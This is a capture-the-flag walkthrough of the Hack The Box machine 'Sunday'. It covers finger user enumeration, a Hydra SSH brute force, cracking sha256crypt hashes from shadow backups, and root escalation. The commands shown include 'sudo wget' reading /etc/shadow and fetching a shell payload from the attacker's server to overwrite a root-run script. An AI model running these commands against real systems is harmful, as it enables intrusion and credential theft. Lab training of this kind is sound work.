When I connect to a machine I usually use nmap to scan, but just to learn new tools I will use rustscan to scan all ports and then nmap to fingerprint the versions and run scripts against the open ones.
Finger is an older protocol that displays information about users on a machine. It can be abused to verify whether a username is valid on that host, because the daemon answers differently for existing and non-existing accounts. The protocol was designed in the 1970s, listens on TCP port 79, and runs in cleartext with no authentication. (ref) (ref2)
So now we need to gather information about users on the machine. To do this we can use Metasploit (auxiliary/scanner/finger/finger_users), but I will use finger-user-enum by pentestmonkey.
```
$ wget https://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
$ tar -xzf finger-user-enum-1.0.tar.gz && cd finger-user-enum-1.0
# we need a list of users to brute force
# i will use this: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/names.txt
$ ./finger-user-enum.pl -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 10.10.10.76
access@10.10.10.76: access No Access User                     < .  .  .  . >..nobody4   SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                 < .  .  .  . >..dladm    Datalink Admin        < .  .  .  . >..netadm   Network Admin         < .  .  .  . >..netcfg   Network Configuratio  < .  .  .  . >..dhcpserv DHCP Configuration A  < .  .  .  . >..ikeuser  IKE Admin             < .  .  .  . >..lp       Line Printer Admin    < .  .  .  . >..
annemarie@10.10.10.76: Login       Name               TTY         Idle    When    Where..anne     ???..marie    ???..
bin@10.10.10.76: bin      ???                   < .  .  .  . >..
deedee@10.10.10.76: Login       Name               TTY         Idle    When    Where..dee      ???..dee      ???..
ike@10.10.10.76: ikeuser  IKE Admin             < .  .  .  . >..
joann@10.10.10.76: Login       Name               TTY         Idle    When    Where..ann      ???..jo       ???..
laverne@10.10.10.76: Login       Name               TTY         Idle    When    Where..la       ???..verne    ???..
line@10.10.10.76: Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin    < .  .  .  . >..
message@10.10.10.76: Login       Name               TTY         Idle    When    Where..smmsp    SendMail Message Sub  < .  .  .  . >..
miofmela@10.10.10.76: Login       Name               TTY         Idle    When    Where..mela     ???..miof     ???..
root@10.10.10.76: root     Super-User            ssh          <Dec  7, 2023> 10.10.14.46..
sammy@10.10.10.76: sammy    ???                   ssh          <Apr 13, 2022> 10.10.14.13..
sunny@10.10.10.76: sunny    ???                   ssh          <Apr 13, 2022> 10.10.14.13..
sys@10.10.10.76: sys      ???                   < .  .  .  . >..
zsazsa@10.10.10.76: Login       Name               TTY         Idle    When    Where..zsa      ???..zsa      ???..
```

(finger-user-enum prints each server reply on one line and shows the newlines in the reply as `..`.)
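The enumeration above is nothing more than sending a name over a cleartext TCP connection and diffing the reply against what the daemon says for a name that does not exist. The following Python client is added for this page (it is not finger-user-enum and not part of the original writeup) to show that logic end to end. Because the target is not reachable offline, it talks to a constructed stand-in fingerd on a loopback port whose header and rows are copied from the output above; `FAKE_ACCOUNTS`, `start_fake_fingerd` and the port number are all assumptions of the example.

```python
import random
import socket
import string
import threading

# Constructed stand-in for the target's fingerd: header and "last login" rows
# are modelled on the finger-user-enum output above, not fetched from the box.
HEADER = "Login       Name               TTY         Idle    When    Where\n"
FAKE_ACCOUNTS = {
    "root":  "root     Super-User            ssh          <Dec  7, 2023> 10.10.14.46\n",
    "sammy": "sammy    ???                   ssh          <Apr 13, 2022> 10.10.14.13\n",
    "sunny": "sunny    ???                   ssh          <Apr 13, 2022> 10.10.14.13\n",
}

def _fake_fingerd(srv):
    """Answer each connection like finger(1): read one line, reply, close."""
    while True:
        conn, _ = srv.accept()
        with conn:
            query = conn.recv(512).decode(errors="replace").strip()
            query = query.replace("/W", "").strip()   # RFC 1288 verbose flag, ignored here
            body = FAKE_ACCOUNTS.get(query, "")       # unknown user: header only
            conn.sendall((HEADER + body).encode())

def start_fake_fingerd():
    """Bind an ephemeral loopback port, serve it in a daemon thread, return the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)
    threading.Thread(target=_fake_fingerd, args=(srv,), daemon=True).start()
    return srv.getsockname()[1]

def finger(host, port, name, timeout=5.0):
    """Minimal RFC 1288 client: send '<name>\\r\\n' and read until the server closes."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(f"{name}\r\n".encode())
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")

def enumerate_users(host, port, candidates):
    """finger-user-enum logic: query a junk name for a baseline, report every
    candidate whose reply differs from it. Returns the valid names, sorted."""
    junk = "".join(random.choices(string.ascii_lowercase, k=12))
    baseline = finger(host, port, junk)
    return sorted(n for n in candidates if finger(host, port, n) != baseline)

if __name__ == "__main__":
    port = start_fake_fingerd()
    wordlist = ["admin", "sammy", "sunny", "root", "zsazsa"]   # constructed sample list
    for user in enumerate_users("127.0.0.1", port, wordlist):
        print("valid:", user)
```

Against a real host, point `finger()` at port 79 and feed `enumerate_users()` the SecLists names file; the baseline comparison is what makes this robust to daemons that return a header (or a canned message) for unknown users instead of an error.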
SSH 22022/tcp
Finger shows three accounts whose last login was over SSH: root, sammy and sunny. So now we will try to brute force SSH, which is on the non-standard port 22022.
We couldn't brute force root or sammy, but we got sunny:sunday.
```
$ hydra -s 22022 -t 64 -l sunny -P /usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt 10.10.10.76 ssh
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-14 10:24:32
[DATA] max 64 tasks per 1 server, overall 64 tasks, 1575 login tries (l:1/p:1575), ~25 tries per task
[DATA] attacking ssh://10.10.10.76:22022/
[STATUS] 434.00 tries/min, 434 tries in 00:01h, 1168 to do in 00:03h, 37 active
[22022][ssh] host: 10.10.10.76   login: sunny   password: sunday
1 of 1 target successfully completed, 1 valid password found
```

Hydra warns for ssh that many servers cap parallel connections and recommends `-t 4`: with `-t 64` against a single sshd some attempts can be dropped and silently lost, so if a wordlist finds nothing, rerun with fewer tasks before ruling it out.
Now we are logged in as sunny, but there is no user.txt in the home directory, which means the user flag belongs to another account we need to find.
```
$ ssh sunny@sunday.htb -p 22022
$ cat /etc/passwd | grep bash
root:x:0:0:Super-User:/root:/usr/bin/bash
openldap:x:75:75:OpenLDAP User:/:/usr/bin/pfbash
sammy:x:100:10::/home/sammy:/usr/bin/bash
sunny:x:101:10::/home/sunny:/usr/bin/bash
# so we need to get sammy's password
```
Let's keep searching the machine for anything odd. sunny's .bash_history shows the commands that were run before:
```
$ cat ~/.bash_history
su -
sudo -l
sudo /root/troll
ls /backup
ls -l /backup
cat /backup/shadow.backup
# let's see what sudo -l gives sunny
$ sudo -l
User sunny may run the following commands on sunday:
    (root) NOPASSWD: /root/troll
$ sudo /root/troll
testing
uid=0(root) gid=0(root)
# it prints "testing" and then runs id as root
# we can't edit it or even read it (it lives in /root), and researching the name told us nothing,
# so we continue with /backup
$ ls -la /backup
-rw-r--r--   1 root     root         319 Dec 19  2021 agent22.backup
-rw-r--r--   1 root     root         319 Dec 19  2021 shadow.backup
$ cat /backup/agent22.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
$ cat /backup/shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
# they are identical; only sammy and sunny have real hashes (*LK* is a locked account, NP means no password)
```
We have sammy's hash. A crypt(3) hash has the form `$id$salt$hash` (or `$id$rounds=N$salt$hash`), and the `$id$` prefix tells us which algorithm produced it:
$1$ is md5crypt (MD5) | $2a$ / $2b$ / $2y$ are bcrypt (Blowfish-based) | $5$ is sha256crypt (SHA-256) | $6$ is sha512crypt (SHA-512) | $y$ is yescrypt
Now we know it is sha256crypt, so we will use hashcat.
To get the hashcat mode we look at their example-hashes page. Searching for "SHA-256" only gives raw SHA-256 (mode 1400), a plain hex digest that looks nothing like what we have; searching for `$5$` instead gives "sha256crypt $5$, SHA256 (Unix) 2", which is mode 7400.
For a faster result run it on your bare-metal OS rather than inside a VM. Since I have Windows I used it there, and it didn't take a second to crack. [ Hashcat | rockyou.txt ]
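To make the `$id$` table and the mode choice concrete, here is an added Python example (not from the original writeup and not hashcat code): it classifies each field of a shadow-style file, maps the prefix to the hashcat mode, and implements sha256crypt from the public specification so a cracked candidate can be verified against its salt without a GPU. `CRYPT_IDS`, `SHADOW_BACKUP` (an excerpt copied from the backup file shown above) and the function names are the example's own; the algorithm steps follow glibc/Solaris crypt(3), which is what hashcat mode 7400 attacks.

```python
import hashlib
import hmac
import re

# Prefix -> (crypt(3) algorithm, hashcat mode). yescrypt has no hashcat mode; use john for it.
CRYPT_IDS = {
    "1": ("md5crypt", 500),
    "2a": ("bcrypt", 3200), "2b": ("bcrypt", 3200), "2y": ("bcrypt", 3200),
    "5": ("sha256crypt", 7400),
    "6": ("sha512crypt", 1800),
    "y": ("yescrypt (no hashcat mode; use john)", None),
}
B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# Byte order in which the final digest is base64-encoded, as given in the spec.
ORDER = [(0, 10, 20), (21, 1, 11), (12, 22, 2), (3, 13, 23), (24, 4, 14),
         (15, 25, 5), (6, 16, 26), (27, 7, 17), (18, 28, 8), (9, 19, 29)]

def identify(field):
    """Classify one shadow password field: lock/no-password markers or a $id$ hash."""
    if field in ("*LK*", "*", "!", "!!", "NP", ""):
        return ("not crackable: locked or no password", None)
    m = re.match(r"^\$([^$]+)\$", field)
    return CRYPT_IDS.get(m.group(1), ("unknown", None)) if m else ("DES or unknown", None)

def _rep(digest, n):
    """Repeat a 32-byte digest to exactly n bytes (steps 9-10, 16 and 20 of the spec)."""
    return (digest * (n // 32 + 1))[:n]

def sha256_crypt(password, salt, rounds=None):
    """sha256crypt ($5$) as glibc/Solaris crypt(3) compute it; returns the full hash string."""
    pw, salt = password.encode(), salt[:16].encode()          # salt is capped at 16 chars
    r = 5000 if rounds is None else min(max(rounds, 1000), 999_999_999)
    b = hashlib.sha256(pw + salt + pw).digest()
    a = hashlib.sha256(pw + salt)
    a.update(_rep(b, len(pw)))
    n = len(pw)
    while n:                                   # one extra mix per bit of len(password)
        a.update(b if n & 1 else pw)
        n >>= 1
    a = a.digest()
    p = _rep(hashlib.sha256(pw * len(pw)).digest(), len(pw))
    s = _rep(hashlib.sha256(salt * (16 + a[0])).digest(), len(salt))
    c = a
    for i in range(r):                         # the cost loop that makes mode 7400 slow
        h = hashlib.sha256(p if i & 1 else c)
        if i % 3:
            h.update(s)
        if i % 7:
            h.update(p)
        h.update(c if i & 1 else p)
        c = h.digest()
    out = []
    for x, y, z in ORDER + [(None, 31, 30)]:   # last group encodes only two bytes
        w = ((c[x] << 16) if x is not None else 0) | (c[y] << 8) | c[z]
        for _ in range(4 if x is not None else 3):
            out.append(B64[w & 0x3F])
            w >>= 6
    prefix = "$5$" + (f"rounds={r}$" if rounds is not None else "")
    return prefix + salt.decode() + "$" + "".join(out)

def verify(shadow_hash, password):
    """Recompute a $5$ hash from its own salt and rounds and compare in constant time."""
    m = re.match(r"^\$5\$(?:rounds=(\d+)\$)?([^$]{0,16})\$", shadow_hash)
    if not m:
        raise ValueError("not a sha256crypt hash")
    rounds = int(m.group(1)) if m.group(1) else None
    return hmac.compare_digest(sha256_crypt(password, m.group(2), rounds), shadow_hash)

def parse_shadow(text):
    """Yield (user, field, classification) for each non-empty line of a shadow-style file."""
    for line in text.splitlines():
        if not line.strip():
            continue
        user, field = line.split(":", 2)[:2]
        yield user, field, identify(field)

# Constructed excerpt of /backup/shadow.backup as shown on this page.
SHADOW_BACKUP = """\
openldap:*LK*:::::::
postgres:NP:::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

if __name__ == "__main__":
    for user, field, (algo, mode) in parse_shadow(SHADOW_BACKUP):
        print(f"{user:10} {algo:40}", f"hashcat -m {mode}" if mode else "")
    sunny = next(f for u, f, _ in parse_shadow(SHADOW_BACKUP) if u == "sunny")
    print("sunny:sunday matches the backup hash:", verify(sunny, "sunday"))
```

`verify()` is what hashcat does once per candidate, which is also why cracking in pure Python is hopeless: 5000 SHA-256 rounds per guess is the whole point of the cost parameter, and the GPU is where that loop belongs.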
```
$ ssh sammy@sunday.htb -p 22022
$ id
uid=100(sammy) gid=10(staff)
$ wc user.txt
1 1 33 user.txt
```
For privilege escalation there are several ways, and I will try to write about all of them.
#1 Sudo all
```
$ sudo -l
User sammy may run the following commands on sunday:
    (ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
# (ALL) ALL means sammy can run any command as root (it asks for sammy's password, which we have), so we just spawn a root shell
$ sudo /bin/bash
root@sunday:/home/sammy# wc /root/root.txt
1 1 33 /root/root.txt
```
#2 wget
When we see binaries we can run as root we look them up on GTFOBins to see what can be done with them.
```
# For a fast win we can read /root/root.txt (the flag): wget -i treats every line of the file
# as a URL and echoes it back while trying to fetch it, so the file's contents leak in the output
$ sudo wget -i /root/root.txt
--2024-10-14 15:51:22--  http://456efbda87744c9fe91f7358645a8c08/
# the flag is the text between the two slashes
# the same trick reads /etc/shadow, then we can crack root's password
$ sudo wget -i /etc/shadow
--2024-10-14 15:41:18--  ftp://root/$5$rounds=10000$fIoXFZ5A$k7PlwsiH0wAyVOcKaAYl/Mo1Iq6XYfJlFXs58aA4Sr3:18969::::::23997553
           => ‘Mo1Iq6XYfJlFXs58aA4Sr3:18969::::::23997553’
# $5$rounds=10000$fIoXFZ5A$k7PlwsiH0wAyVOcKaAYl/Mo1Iq6XYfJlFXs58aA4Sr3 is root's hash
#########
# wget can also write files as root (-O), so we can overwrite /root/troll,
# the script sunny may run with sudo, and get a root shell as sunny
# i think that was the intended path for the box
# make a file named "troll" (the shell payload) and serve it with python:
# python3 -m http.server 8000
# the terminals have to be set up like this: run sammy's command first, then sunny's right after
sammy$ sudo wget -i http://10.10.16.8:8000/troll -O /root/troll
sunny$ sudo /root/troll
# and we get a root shell in sunny's terminal
# (the plain form "sudo wget http://10.10.16.8:8000/troll -O /root/troll" does the same download)
```
With `wget -i` as root we can read four files in /root:
- root.txt : the flag
- troll : the file that sunny can run as root
- troll.original : a backup copy of troll
- overwrite : a script that runs every 5 seconds and restores troll from troll.original, which is why the replaced troll has to be executed within that window